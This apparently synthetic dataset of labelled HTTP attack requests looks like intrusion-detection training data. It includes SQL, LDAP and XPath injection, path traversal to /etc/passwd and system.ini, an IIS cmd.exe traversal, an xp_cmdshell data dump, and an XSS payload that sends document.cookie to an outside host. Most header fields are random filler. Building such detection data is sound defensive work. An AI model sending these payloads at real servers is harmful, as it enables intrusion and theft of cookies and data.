Proxy-Authorization: qceto diof8g=camemest
Authorization: oeifa renlcmT=aansato
Range: -58,988-4242
Referer: http://www.Ynoe59ii.fr/so5m/rn4vcisl.jsp
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.5 (compatible; tyY8Riett; Unix; eae0eh5nct; ndth3i1rae; ouiY4o)
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.8 80.34.36.102, 4.9 www.bxhehetn.html:0749
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 999 147.111.219.75 "f2re1Ss" 

null

End - Id: 42383
Start - Id: 45068
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.oewyitj1p.cz
Connection: apEoo
Accept: */*;q=0.9
Accept-Charset: x-mac-greek, gb2312, cp-932
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 4.109.212.12
Cookie: irnh6Oeks=rnmXdh;YRq@=Gvart-H;traas=pjteoaeia;nTitiEmin=s3hvngbsprnwi;catfr=pal7hIfrJja;tggimgT2whereDhtpassS4U=rr
Cookie2: $Version="40"
Date: Tue, 14 Feb 06 21:18:50 GMT
ETag: "qWUh9tHs4AaboJ3l"
Expect: z4wo
From: feeaptn@RiywlCee.net
If-Modified-Since: Mon, 26 Apr 10 01:37:54 UTC
If-Unmodified-Since: Tue, 30 Nov 04 22:28:36 GMT
If-Match: *
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: *
Max-Forwards: 53
Pragma: uren=hno
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: wwm4 lhte=39nrsuh
Range: 51016-,-10087
Referer: http://www.jot0n.net/spnsqn0.wmn
TE: trailers
Trailer: Host
User-Agent: fSDtXa http://www.exaren5.uk
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: r42/7.8, zsa7/0.2
Warning: 528 www.upne0nt.css "aiL0woeteemwnh" "Sat, 27 Sep 08 17:37:43 UTC"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45068
Start - Id: 37324
class: LdapInjection
GET /oK/ckW.TBWgvtLWLEVn6/@cBnkXvbscriptoZZ/xpga4lIo1Nu8/aKkw7g3ph3ob3yubNnX/tmptc.html?r21ftpZ1@=228442957&wodnlrrs8tce6=2e+ea&so=ceofo6nlT1eyo9i&mgsso=026584&n@processing-instructionp@qAinsert7ks=8smsehz%3Bobjectat9loa&eImso=57&n9isonlrtevT=yd3tow8e7beeea&otse=vc9td+YI+&vannR1naondq=74345629&S5hrft2aape7=o44HnQD-z&c1rrkrgozsl=wp-frome%28e&nesr=rtsiwoc&p7iWX..binWal=w7a8&toLwizler8hw=firo%7C2c%24adloou++eot&30htilof=03935266 HTTP/1.0
Host: www.zsEipibms.com
Connection: close
Accept: image/*;q=0.1, video/*;q=0.8
Accept-Charset: koi8, x-mac-icelandic, iso-8859-8, iso-8859-8-i
Accept-Encoding: )  (    |   (displayName=had*)  (name  =  had*  )(   mail=had*    )
Accept-Language: q3-trti
Cache-Control: oAihze=6uf
Client-ip: 68.215.146.126
Cookie: otasqwssmH9t=731
Cookie2: $Version="82"
Date: Wed, 30 Nov 05 17:51:50 GMT
ETag: "98VQaYC9N.W5V.CpbpHX"
Expect: w3ene=oyyhtsy;atlc
From: ddtp@lesT.org
If-Modified-Since: Sat, 17 Jan 09 12:46:10 CET
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 5.2
Pragma: uocoeH=t
Proxy-Authorization: Digest nc=928B9895
Authorization: NTLM bmxrNERjYXRJVG80bnRoZGFkYXNhZWdnVmVubW9wb2VoZHNidG85UnFlaQ==
Range: 1-568088,6956-8,075-
Referer: /taltt.jsp
TE: gzip;q=0.7,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.3 (Windows; U; Win 9x 5.3; is-rr; rv:5.4.5) Gecko/93706663
UA-CPU: x86
UA-Disp: 2661,0577,16
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: identity
Upgrade: heF/2.0, te4nOj/7.2, eHiy5/0.3, axi7h/7.2, neuis/0.9
Warning: 243 89.15.152.59 "iLdoeejpAomf9" 
X-Forwarded-For: 71.227.252.82
X-Serial-Number: 06549032
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37324
Start - Id: 46331
class: PathTransversal
GET /ehfezsrt/ViIqIlhome7/blrmvKziF.html?csa=ohomeyxmlziaimcoe&kITp3V6Y-passwd=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.0
Host: www.es6q.ch
Connection: tEsatgs
Accept: video/quicktime
Accept-Charset: x-mac-hebrew, utf-8;q=0.0, x-mac-icelandic
Accept-Encoding: *
Accept-Language: t0il0Ns4-y6, s-torea;q=0.9, b-omu;q=0.4, tytxes8-r5st;q=0.3, srns-8
Cache-Control: no-store
Client-ip: 146.96.8.202
Cookie: c5op=rlhwinntt]w3En;taerri5t8et7me=tGKmNLY@mKi;-UHFL=b75lxZPK;IOe6eatrhusiihi=mWLiS87k
Cookie2: $Version="16"
Date: Fri, 29 Jun 07 24:04:08 UTC
ETag: "@85HgN2pUsOQN6a@owQ"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "FjOW18OY0VgKOlv.PMv"
If-None-Match: *
If-Range: "slnPTwfk7G9XoLL7KF0S"
Max-Forwards: 50
MIME-Version: 3.4
Pragma: Ue=uyd3P
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 11-897,103770-88,-588131
Referer: /ezuuriO/8roze5ho/4rb8o/caozeahU.asmx
TE: deflate;q=0.2,trailers,trailers
Trailer: Max-Forwards
User-Agent: rs5igt2eee
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 598x8169
Via: 9.7 www.pkttom7.jpg, 3.0 www.lenDaNre.html, 3.5 www.dgtg.js
Transfer-Encoding: tlxupn
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46331
Start - Id: 41102
class: SqlInjection
GET /nJAl-@zigEaF1s7/IRQPQTO6CFD.C/EVoyq/woal6/saiEdr-/csR3npYe@6r.cgi?6ajior7T=exec+++++xp_cmdshell+++++%27bcp+++++%22select+++*+++from+++mcNedro%22+queryout+++pwdump.exe++-c+-Craw+-Shackersip++-Usa+++++-Ph8ck3r%27 HTTP/1.1
Host: www.tnmh2Se.org
Connection: keep-alive
Accept: image/gif;q=0.5
Accept-Charset: x-mac-greek, x-mac-arabic;q=0.3
Accept-Encoding: identity;q=0.7
Accept-Language: 5e-2eie3, kh-w;q=0.1, shoiI-lateOn4;q=0.1, uph-rIvoy5t;q=0.4
Cache-Control: min-fresh=930
Client-ip: 26.15.87.96
Cookie: nsUatrbIeeeh3ah=|wtx;asuumccOrrRutls=a3sAbne;psa=DasietDOsafnit1u;roethSA0w=p5rGjwjcqizQ
Cookie2: $Version="183"
Date: Mon, 08 May 06 02:21:33 CET
ETag: "08c.BwX7mSH8DfY"
Expect: 100-continue
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Wed, 20 Jan 10 15:20:26 GMT
If-Match: "QyJJ3vQbiqtei8rvrPq"
If-None-Match: *
If-Range: *
Max-Forwards: 684
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: eotpD tuweeo=plts5pr
Range: -397
Referer: http://www.n04aemo.it/ue0ot5gt.asp
TE: gzip,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 8.9; ar-dr; rv:4.7.6) Gecko/52499084
UA-CPU: Sparc
UA-Disp: 926,7799,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: HTTP/5.8 71.103.187.8
Transfer-Encoding: proa2
Upgrade: rsie/6.2, ped/8.7, tlgq/8.5, FsiO/2.3
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41102
Start - Id: 37004
class: LdapInjection
GET /s8PexJN4J3/m@MpMYh/yEFfc441_3@KBy0aM/yelaihnnhasIons5/PtYwH5vLD/cZw1eBSxXozNNiKVIxhs/sLQvvvv/aea2g/eHP_N3i3eceot5fzkt.shtml?ow1ehlokeatoy=dyizteh&DdYxp_SbfromTVvr=linkratd%3F+https+hhae&4tnf=3293799&zde5lrkoatrN=sgtVS02ccirsa0eo&saEtFmnissa=Ecut8hdd&3UFDPjwM=%29++%28%7C++++%28displayName%3Dhad*%29%28name+++%3D+had*++%29%28++mail%3Dhad*++++%29 HTTP/1.0
Host: 145.146.80.183:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: g-enretie, arlbepi-a2, OwgtLhlb-j8iun;q=0.8, toDcsaA-ene;q=0.1, ntemy-io;q=0.6
Cache-Control: min-fresh=6
Client-ip: 134.238.253.203
Cookie: t0=mdsordefem%5C%3D;cvewoqzt2u=mn3;gmsbu7crglv=dyaORf5;ic6n0Edcazgas=ni0ds5%3DnAruadminEiueA;jY%uuHvzXgroup by=9T1;ri7sofmseuxo0ed=0731555280
Cookie2: $Version="554"
Date: Wed, 09 Jul 08 24:21:09 CET
ETag: W/"90Qjiqk4A1FWruj"
Expect: 100-continue
From: 4taAnee@sfR4.cz
If-Modified-Since: Sat, 14 Apr 07 21:25:48 GMT
If-Unmodified-Since: Wed, 30 Aug 06 07:16:24 CET
If-Match: "hawz@beP@TkDSgMB"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 336
MIME-Version: 6.2
Pragma: 0six=i
Proxy-Authorization: wXdaMt sohtZ=zc5ittfu
Authorization: Basic YWlIb3R0Om9pZW5hdQ==
Range: 11-,-9658
Referer: http://www.tEsN.fr/e67itra/koot/tccsinP1.mp3
TE: gzip;q=0.0
Trailer: If-Match
User-Agent: xOnthe7nlhea2
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-Color: color32
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 919 www.v8i3eh.html "hterlDuo" "Fri, 28 Oct 05 03:05:23 GMT"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37004
Start - Id: 44703
class: PathTransversal
PUT /evalchildZ/bVrZg2-echo/njKx1FOM9sNVk5uHbDV/nsiseafSgludAte0u/sortequ/ohhocamfcewRvca4uaf/Y1XPoeC78/e0tEd-/d8X@sZleGFF.L/2-Ft-bW/I4H8@m.png? HTTP/1.0
Content-Length: 137
Content-Language: d,se,twhieqsj
Content-Encoding: compress
Content-Location: http://U6us.de/lt8a/pArrsni/ats4f/94uL.asmx
Content-MD5: eEVseXJsY0hnaHNwRHVmYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 06:56:56 GMT
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: www.rdkk6ru.org
Connection: close
Accept: application/zip
Accept-Charset: x-mac-roman;q=0.9, x-mac-greek;q=0.7, iso-8859-8-i
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.172.8.1
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="933"
Date: Tue, 20 Nov 07 10:36:16 GMT
ETag: W/"LMhgcAcKZubNHyMAZq"
Expect: lnumHot=vabdgrue;cMiuP
From: aiino4r@HoCiOqeo.be
If-Modified-Since: Fri, 22 May 09 23:19:01 UTC
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 54
MIME-Version: 8.4
Pragma: htmjegse='Edo0'
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: j3ii yDedica8=jsenoe
Range: 8542-,-709
Referer: http://ulhd.be/8uedweHs/adpat/sxrueh/nf0qssl.mdb
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.3 (X11; U; Solaris 0.8; ni-uo; rv:6.5.4) Gecko/75490748
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 770x653
Via: 8.9 193.116.9.112
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

_wMqwSFwinnte=he)Ii5siyle:a5A&vethbnl=doc(   file:///c:/ebm/S9ts.xml)&jjo=cmi%uadmindFspa&boiln=Ojiab1z;a3agreS

End - Id: 44703
Start - Id: 35502
class: XPathInjection
GET /rehttcosdanez0/q6fKY/srcet8eatseadelz/r0tmaeadrne/HzjP/rrlvnwoZnpiiag.tiff?mz9tpCnEzneL=eWYV7rRhiA&lZlrDphiiairoo=t2Xocopy%2Bsmvbscriptp-hnevalfiukhh&2MgNfe5u0dgnd=o&0a2tSGG6-=21936756&Et3caeafo=7587&eeehel=eresri18a2aame&OgpnteWuioMu=9878901242 HTTP/1.0
Host: 216.79.226.108:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 71.50.53.20
Cookie: ni7=T Nossh;tsh1=91592;yyMr=12741;fzvuAmanco05=981  or   yh/nrh/5l/child::node()[position()=999]   or 3=;7TOi=hxawda4m4ioe3at;btincnell2wfiao=949
Cookie2: $Version="2"
Date: Fri, 13 Oct 06 19:45:45 CET
ETag: "ci7RaTo7gJVfxwB"
Expect: 100-continue
If-Modified-Since: Mon, 15 Feb 10 23:38:20 GMT
If-Unmodified-Since: Sun, 11 Dec 05 19:03:11 UTC
If-Match: *
If-None-Match: "JBhl9pWIN7AfmTCvS7l"
If-Range: Fri, 28 Jul 06 12:16:10 GMT
Max-Forwards: 5080
MIME-Version: 8.6
Pragma: a=ctp7Enwn
Authorization: NTLM bHNyVWFlb25wZXdrYTJOZGFENHNoaWVvdXBwbWVkdGxkZ1dpdzl0M2o=
Range: 76101-
Referer: http://pcts4De.it/zehen4n/6takme/ceMuIRe.php
Trailer: Upgrade
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 9.1; 3E-n5; rv:6.4.3) Gecko/02568041
Via: 0.4 71.64.1.77
Transfer-Encoding: deflate
Warning: 037 www.ramdut.png "awsh" 
X-Forwarded-For: 70.179.167.130
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35502
Start - Id: 47944
class: XSS
GET /cqgrrttxmjahck/e.7bQnTVd90M2JAVR/eDkgaozZomrFl/Dne/Gn@aGl4e9C/fMmosw/eU-iFHMoXyi-MKSKmQZs.htm?0-usrecho3Wfhtaccesitmeta=17862018&oeNrdiacansv=krere24&oiv=%3Fa&Tewss=02494037&oant9mpec4=HRHn&elak=e&ee=751&sThletfdk=653848&hh0d0qHpm=+iRenlc&6o9eoakHtHotc=333276&2STIidu2e09=%3Cxml++id++++%3D+++%22++++X++++%22+%3E%3Ca+++%3E%3Cb++%3E%26lt%3Bscript+%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.denaerro.com%2Fcgi-bin%2Fstntis.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb+++%3E%3C%2Fa%3E%3C%2Fxml+++%3E&joAhaitmiqGt=tg HTTP/1.1
Host: www.eamesvt8.cz:80
Connection: noeere
Accept: text/xml;q=0.0, image/png, application/postscript
Accept-Charset: us-ascii;q=0.9, euc-tw;q=0.1, x-mac-japanese, utf-7, us-ascii
Accept-Encoding: identity, gzip;q=0.8, identity;q=0.9
Accept-Language: dbta-oe3, af-eco, a8mNel-f5asur;q=0.9, dtIa-nssHg1;q=0.6, renxh8e0-oh
Cache-Control: no-cache
Client-ip: 55.58.52.249
Cookie: nost0n=:eew;4Air6os=) wn[orrzstront
Cookie2: $Version="30"
Date: Tue, 25 May 04 10:01:24 UTC
ETag: "dkVEE-H0oxW@ES_Bxo3p"
Expect: nrmash=oeIs4neR;etmomp=ogtht
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Wed, 08 Nov 06 17:51:17 GMT
If-Unmodified-Since: Sun, 08 Feb 04 21:36:17 UTC
If-Match: "_@TaipZZGQ5OuW1tZM"
If-None-Match: *
If-Range: Tue, 04 Mar 08 04:52:56 UTC
Max-Forwards: 8401
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: NTLM Q2J0c25nczVSb2VMb3NvdHJkOHJpTkUzZWVwYXRlaUM5b3Nub3ZvdQ==
Range: -162,92-
Referer: /p3rora5/8mrtcl.tar.gz
TE: gzip
Trailer: Max-Forwards
User-Agent: rpUmjnnH http://www.iNs6ein.com
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7476x522
Via: FTP/7.1 111.194.175.184
Transfer-Encoding: compress
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 668643049393558
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47944
Start - Id: 44142
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.84wescap.de
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 31.223.174.93
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="03"
Date: Sat, 04 Sep 04 23:07:30 GMT
ETag: W/"W7fa4Q-.MjhJ7B8G"
Expect: Fzazt0Oa
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 09 Jan 10 01:34:53 GMT
If-Unmodified-Since: Sun, 21 Jun 09 04:15:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 4.2
Pragma: 6mAtm9f=4njseaeI
Proxy-Authorization: Basic ZHJueHU6c3J0M2FIbGU=
Authorization: fvfmr H30ll=wuel0uwq
Range: 815-,644-20793
Referer: /etnodaal/iiEe0l/etuna/sedcas.jpg
TE: gzip,deflate;q=0.7,trailers
Trailer: Date
User-Agent: etshieh/9.2
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/6.1 www.oNidwgea.shtml, 4.5 www.hctuThra.jpeg
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 107 www.si6e.html "aijehiis7sesns5zav5" "Sun, 10 Oct 04 08:09:53 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44142
Start - Id: 46549
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: 238.187.99.152:2297
Connection: fhe8
Accept: text/html;q=0.8
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 23.69.31.217
Cookie: lsiiaet4oF3lu6o=tkraourtesmdlrsey;NbF@2IOy=EbeyemmrnSw
Cookie2: $Version="88"
Date: Tue, 30 Jun 09 23:36:50 GMT
ETag: "p9L3Ed7aIftUmWU@-"
Expect: atpSh=pnachAn
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 02 Sep 07 10:24:22 GMT
If-Unmodified-Since: Sun, 08 Jun 08 23:39:43 GMT
If-Match: "xIRzK16jp7t-YVqterIT"
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: Sat, 16 Jul 05 05:59:22 CET
Max-Forwards: 309
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic eW50c2k6ZXBsYWFl
Range: 2794-2,-4107
Referer: /Coaeln22/e6ezpt/tose/oyrmx7ul/gHtsT.pdf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.1 (compatible; 5npdeedfhT; Win98; ouRetiSPz)
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 139x000
Via: 3.6 www.leDaou.jpeg, 1.5 36.110.101.55
Transfer-Encoding: deflate
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 705 81.237.142.6 "esee7ectnt" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46549
Start - Id: 47376
class: XSS
GET /itmrUzathoMhvhV/ogrE2rdeeo4mmn/t2UBppXIRy/khul620PACuHV_om2/etnl/me6r4toyffatfen/sDC@YqZlIGhEPROD-LSG.asp?-ncHMR0Uvw=3721941&3ag=%3Cinput+++type+++%3D++%22+image+%22++++dynsrc+++%3D++++%22javascript%3A++%5Balert++++%28%27llue%27%29%3B%5D++++%22+++%3E&fhClwnkWasj=fKDjCwRqW7U HTTP/1.0
Host: www.PefntA.st
Connection: 6FNo
Accept: audio/*;q=0.2, audio/x-wav, audio/basic;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 61.200.67.223
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="004"
Date: Tue, 10 Jun 08 11:18:20 CET
ETag: "7ZoV2DwfimtGVh87f9D7"
Expect: oloi
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sun, 11 May 08 19:33:04 CET
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 2.6
Pragma: msslsc=x4
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic ZGFjdGV0MTplc2hlY0k=
Range: 35419-,75138-2674,165640-
Referer: http://www.twNySie.org/sIwmorut/eOt0ks9.sh
TE: chunked;q=0.1,trailers,gzip;q=0.3
Trailer: Range
User-Agent: e2K6kn http://www.g4inafi.it
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 5.1 www.afOraAo.tiff, FTP/6.7 www.sRswaoe.png
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 167101888
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47376
Start - Id: 37770
class: LdapInjection
GET /mattb9ap7eooME/hjt_Bo138/tW.jgE3/no4n/ctt/O8cbYztnefAvnat8Agt/ao63pnlayaRWCIk1/atQoX/oy.html?Rdi1yqa=5&roaljar=jEpRw%29%28%7C++++%28tblno%3D*%29&wltevtbaeetzs=iDeXrsK_M3&INgo=s%3CygT%27cahrky%3Dexecou HTTP/1.1
Host: 53.196.145.117
Connection: mLiIty
Accept: audio/basic
Accept-Charset: iso-8859-7;q=0.6, utf-8;q=0.7, shift_jis, koi8-r;q=0.1, big5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 55.201.60.227
Cookie: 8tdes12si=ae~
Cookie2: $Version="070"
Date: Wed, 16 May 07 05:27:16 GMT
ETag: W/"RYy4X6t.spo28jV5m8f"
Expect: 100-continue
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Wed, 30 Dec 09 22:31:46 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Aug 06 17:13:24 CET
Max-Forwards: 638
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: http://www.5fl2rwu.org/Hoyrasol/r0lFesch/sHpiohe.cgi
TE: deflate,trailers
Trailer: TE
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 8.5; ln-hd; rv:0.3.5) Gecko/39977994
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 7.8 250.178.230.69:6, FTP/0.0 47.132.1.52
Transfer-Encoding: identity
Upgrade: Ebsle/5.6, dvNtn/8.8, on3/2.1, sae/8.5
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 37770
Start - Id: 49874
class: XPathInjection
GET /XurmVo-5PJtJallfR/t386z/null0@group byX2JGJI6BkWj/77S/lK/hpc69sHk1sbkyIs/eHG5dth60n/9olsIlelmtdgrslsztia/hIp8QJ_xs0Vq7oFh.js?7fwhry=iban%27+++++or+++++1%3C++noamau%2Fhoin00%2Fo%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D++or+++%27ntihAire%27++%3D++++%27 HTTP/1.1
Host: 7.249.15.85
Connection: ieha2aC
Accept: audio/*;q=0.8, text/plain, video/*
Accept-Charset: cp-936, x-mac-icelandic;q=0.9, x-mac-korean;q=0.4, iso-8859-8;q=0.7, euc-jp
Accept-Encoding: gzip;q=0.6, deflate, compress, deflate;q=0.9
Accept-Language: jooi-pt, sttrioe-zr
Cache-Control: no-store
Client-ip: 119.142.72.137
Cookie: oorx=ioorisir
Cookie2: $Version="5"
Date: Thu, 13 Nov 08 02:29:36 UTC
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: *
If-None-Match: *
If-Range: "fWpGjcFJVqB_EiGlefWC"
Max-Forwards: 18
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cGF1aGlvbmFhYVd0ZXRXR1U2dGhyZmVuaXdzbWplbmRyZ2x2bkE2ZQ==
Range: -307462,64-76604
Referer: /vcpad/rbcn/ftnwh.mpeg
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: askI79w http://www.JtgoOO.org
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: HTTP/6.9 126.124.59.169, 8.7 237.183.123.154:001
Transfer-Encoding: wm2h8k
Upgrade: ioh/5.5, bzl/3.8, 7md9/8.9, Pus3ou/3.2, nIiiic/7.8
Warning: 805 www.rthT.jpeg "seTho" "Sat, 29 Apr 06 13:15:49 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 53579820106076
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49874
Start - Id: 42527
class: SqlInjection
